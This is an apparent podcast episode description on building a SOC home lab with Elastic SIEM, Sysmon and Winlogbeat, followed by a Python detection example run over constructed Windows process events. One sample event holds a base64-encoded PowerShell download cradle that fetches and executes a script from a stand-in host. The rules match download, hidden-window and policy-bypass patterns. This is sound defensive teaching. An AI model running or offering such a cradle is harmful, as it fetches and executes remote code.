How to Build a SOC Home Lab (Elastic SIEM) | Practical Demo with Pratyush

In this episode, Prabh sits down with Pratyush to break down SOC (Security Operations Center) architecture and the real skills needed to start and grow a career in a SOC, with a live practical demo of building a basic SOC using open-source tools.

Pratyush on LinkedIn: https://www.linkedin.com/in/pratyush-joshi-3391a0230/
Notes: https://excalidraw.com/#json=uAQ-z09mY63gTK6w0-5uq,rnK-MWtIUPZDl41wHQx7eg

🎯 What You'll Learn in This Podcast
✅ SOC architecture explained (end-to-end workflow)
✅ How log collection, parsing, and visualization actually work
✅ Building a basic SOC using Elastic Stack (ELK)
✅ Setting up Windows logging using Sysmon + Winlogbeat
✅ Creating detections and alerts inside Elastic
✅ Simulating real attacks using Atomic Red Team (MITRE ATT&CK)
✅ How SOC tiers work (L1 → L2 → escalation & reporting)
✅ How freshers can build practical SOC skills at home for free
✅ Why learning a SIEM is the fastest way to understand cybersecurity

🧱 SOC Architecture (Simplified)
Pratyush explains SOC architecture in a simple way:
Endpoints / Servers → Log Forwarder → SIEM (Elastic) → Dashboards → Detection Rules → Alerts → Investigation → Response

We cover how a SOC works across:
- Indexing (storing logs)
- Visualization (dashboards & searches)
- Detection rules (logic + thresholds)
- Alerting (triage & escalation)
- Response (SOAR/XDR concepts)

⚙️ Live Demo: Build a Basic SOC with Elastic Stack (ELK)
Pratyush demonstrates how to set up:
✅ Elasticsearch + Kibana + Logstash
- Installation and configuration basics
- YAML configuration (host IPs, ports, security options; if you relax xpack.security settings to simplify the lab, keep the stack on a host-only network)
- Creating Kibana data views and searching logs
- Understanding how logs are indexed and queried

🖥️ Windows Telemetry Setup (Sysmon + Winlogbeat)

🚨 Detection Engineering: Create Rules + Generate Alerts
Pratyush shows how to:
- Write queries to filter suspicious behavior
- Create detection rules inside Elastic
- Trigger alerts and understand SOC alert pipelines
- Example: PowerShell-based suspicious activity detection (concept-level demo)
This section is a mini introduction to Detection Engineering for SOC analysts.

📈 SOC Career Path (L1 to L2 and Beyond)
Pratyush explains the SOC tiers in a simple way:
Tier 1 (L1)
- Monitor alerts
- Validate true vs false positives
- Escalate suspicious incidents
Tier 2 (L2)
- Deep investigation
- Correlation across logs
- Report writing and remediation suggestions

He also shares why:
✅ Programming helps but is not mandatory to start
✅ SIEM knowledge is the "core engine" of SOC growth
✅ Home labs + practice give freshers a huge edge

🧠 Practical Skills to Become SOC-Ready
We also discuss how to build real-world SOC habits:
- Log triage mindset
- Writing investigation notes
- Reporting and escalation clarity
- Practicing rule creation using Sigma
- Learning from platforms like LetsDefend (for SOC scenarios)

💻 SOC Home Lab Requirements (Minimal Setup)
You can run this lab with:
✅ 8GB RAM minimum (tight once Elasticsearch, Kibana and a Windows VM all run at once; 16GB is comfortable)
✅ 40–50GB storage
✅ VirtualBox / VMware
✅ Ubuntu VM + Windows VM
No paid tools needed.

SOC Playlist: https://www.youtube.com/watch?v=zCLlrFZU0M8&list=PL0hT6hgexlYxd24Jb8OE7vZoas-iTcHAc
ISO 27001 Video: https://www.youtube.com/watch?v=sQqJH2naU6I&t=1454s&pp=ygUeaXNvIDI3MDAxIGltcGxlbWVudGF0aW9uIHN0ZXBz
ISO 27001 Implementation Guide: https://www.youtube.com/watch?v=GBfwk10Hh-o&pp=ygUeaXNvIDI3MDAxIGltcGxlbWVudGF0aW9uIHN0ZXBz
GRC Practical Series: https://www.youtube.com/playlist?list=PL0hT6hgexlYztA41j1bceTfVagP9mtq28
GRC Interview: https://www.youtube.com/playlist?list=PL0hT6hgexlYz1Usn1Nrnur6OzVoz59zyl
Internal Audit: https://www.youtube.com/playlist?list=PL0hT6hgexlYyNWBcGYfabwumCr0GKmLWv
Study with Me Telegram Group: https://t.me/Infoseclearning

#SOC #ElasticSIEM #CyberSecurity #SecurityOperationsCenter #BlueTeam #Sysmon #AtomicRedTeam #MITREATTACK #socanalyst
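The Sysmon + Winlogbeat telemetry section and the PowerShell-based detection example above describe the same pipeline: Sysmon writes process-creation events (Event ID 1), Winlogbeat ships them as JSON, and a rule matches on the command line. The block below is an added example written for these show notes, not code from the episode or from Elastic. The four events are constructed (the winlog.event_data.* names are what Winlogbeat carries from the Sysmon channel, the values are invented), and the rule names, regexes and severities are illustrative. It does one thing a concept-level demo usually skips: it decodes a -EncodedCommand payload before matching, so a download cradle hidden inside base64 still fires the cradle rule.

```python
"""Toy detection pass over Sysmon Event ID 1 records as Winlogbeat would ship them.
Added example for the SOC home lab notes above; events and rules are constructed."""
from __future__ import annotations

import base64
import binascii
import json
import re
from dataclasses import dataclass


def _encoded(script: str) -> str:
    """powershell.exe -EncodedCommand takes base64 of the UTF-16LE script text."""
    return base64.b64encode(script.encode("utf-16le")).decode()


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/a.ps1')"

# Constructed telemetry: one Winlogbeat-style document per line (Event ID 1 = process create).
SAMPLE_EVENTS = [
    {"winlog": {"event_id": 1, "event_data": {  # benign admin use
        "Image": PS, "ParentImage": r"C:\Windows\explorer.exe", "User": "LAB\\alice",
        "CommandLine": "powershell.exe Get-Process | Sort-Object CPU"}}},
    {"winlog": {"event_id": 1, "event_data": {  # hidden window + base64-encoded download cradle
        "Image": PS, "ParentImage": r"C:\Windows\System32\cmd.exe", "User": "LAB\\bob",
        "CommandLine": f"powershell.exe -nop -w hidden -enc {_encoded(CRADLE)}"}}},
    {"winlog": {"event_id": 1, "event_data": {  # Word (macro) launching a script from Temp
        "Image": PS, "User": "LAB\\carol",
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Users\carol\AppData\Local\Temp\inv.ps1"}}},
    {"winlog": {"event_id": 3, "event_data": {  # network connection: not a process-create event
        "Image": PS, "DestinationIp": "10.0.0.5", "DestinationPort": 80, "User": "LAB\\bob"}}},
]
SAMPLE_LINES = [json.dumps(e) for e in SAMPLE_EVENTS]


@dataclass
class Rule:
    """All (field, regex) pairs must match: the AND shape of a Sigma selection or a KQL rule."""
    name: str
    technique: str  # MITRE ATT&CK ID
    severity: str
    where: list[tuple[str, str]]


PS_IMAGE = r"\\(?:powershell|pwsh)\.exe$"
OFFICE_PARENT = r"\\(?:winword|excel|powerpnt|outlook)\.exe$"
# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENCODED_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\b\s+([A-Za-z0-9+/=]{16,})", re.I)

RULES = [
    # Roughly, in Kibana KQL with the Winlogbeat Sysmon module's ECS names:
    # winlog.event_id:1 and process.name:"powershell.exe" and process.command_line:(*-enc* or *-EncodedCommand*)
    Rule("PowerShell encoded command", "T1027", "high",
         [("Image", PS_IMAGE), ("CommandLine", ENCODED_RE.pattern)]),
    Rule("PowerShell download cradle", "T1105", "high",
         [("Image", PS_IMAGE),
          ("CommandLine", r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient"),
          ("CommandLine", r"\biex\b|invoke-expression")]),
    Rule("PowerShell hidden window or ExecutionPolicy bypass", "T1059.001", "medium",
         [("Image", PS_IMAGE),
          ("CommandLine", r"-(?:w|windowstyle)\s+hidden|-(?:ep|executionpolicy)\s+bypass")]),
    Rule("Office application spawning PowerShell", "T1566.001", "high",
         [("Image", PS_IMAGE), ("ParentImage", OFFICE_PARENT)]),
]


def normalize(event: dict) -> dict | None:
    """Keep only process-create events; append the decoded -EncodedCommand payload so
    rules see the real script and not just base64."""
    w = event.get("winlog", {})
    if w.get("event_id") != 1:
        return None
    d = w.get("event_data", {})
    cmd = d.get("CommandLine", "")
    m = ENCODED_RE.search(cmd)
    if m:
        try:
            cmd += " " + base64.b64decode(m.group(1)).decode("utf-16le")
        except (binascii.Error, UnicodeDecodeError):
            pass  # not valid base64/UTF-16; the encoded-command rule still fires on the flag
    return {"Image": d.get("Image", ""), "ParentImage": d.get("ParentImage", ""),
            "User": d.get("User", ""), "CommandLine": cmd}


def evaluate(event: dict, rules: list[Rule] = RULES) -> list[dict]:
    """Return one alert dict per rule whose conditions all match the event."""
    fields = normalize(event)
    if fields is None:
        return []
    return [{"rule": r.name, "technique": r.technique, "severity": r.severity,
             "user": fields["User"], "command_line": fields["CommandLine"]}
            for r in rules
            if all(re.search(rx, fields[f], re.I) for f, rx in r.where)]


def run(lines: list[str]) -> list[dict]:
    """Evaluate every JSON line, as a SIEM would evaluate each indexed document."""
    return [a for line in lines for a in evaluate(json.loads(line))]


if __name__ == "__main__":
    for a in run(SAMPLE_LINES):
        print(f"[{a['severity']:6}] {a['rule']} ({a['technique']}) user={a['user']}")
```

Running it produces five alerts: three for the encoded cradle (the cradle rule only matches because the payload was decoded), two for the Word-spawned script, and none for the benign Get-Process or the Event ID 3 record. The same AND-of-conditions shape is what you write as a Sigma selection or as the KQL of an Elastic custom query rule; Atomic Red Team's T1059.001 tests are a convenient way to generate the second and third events on the Windows VM and confirm the rule fires in Kibana.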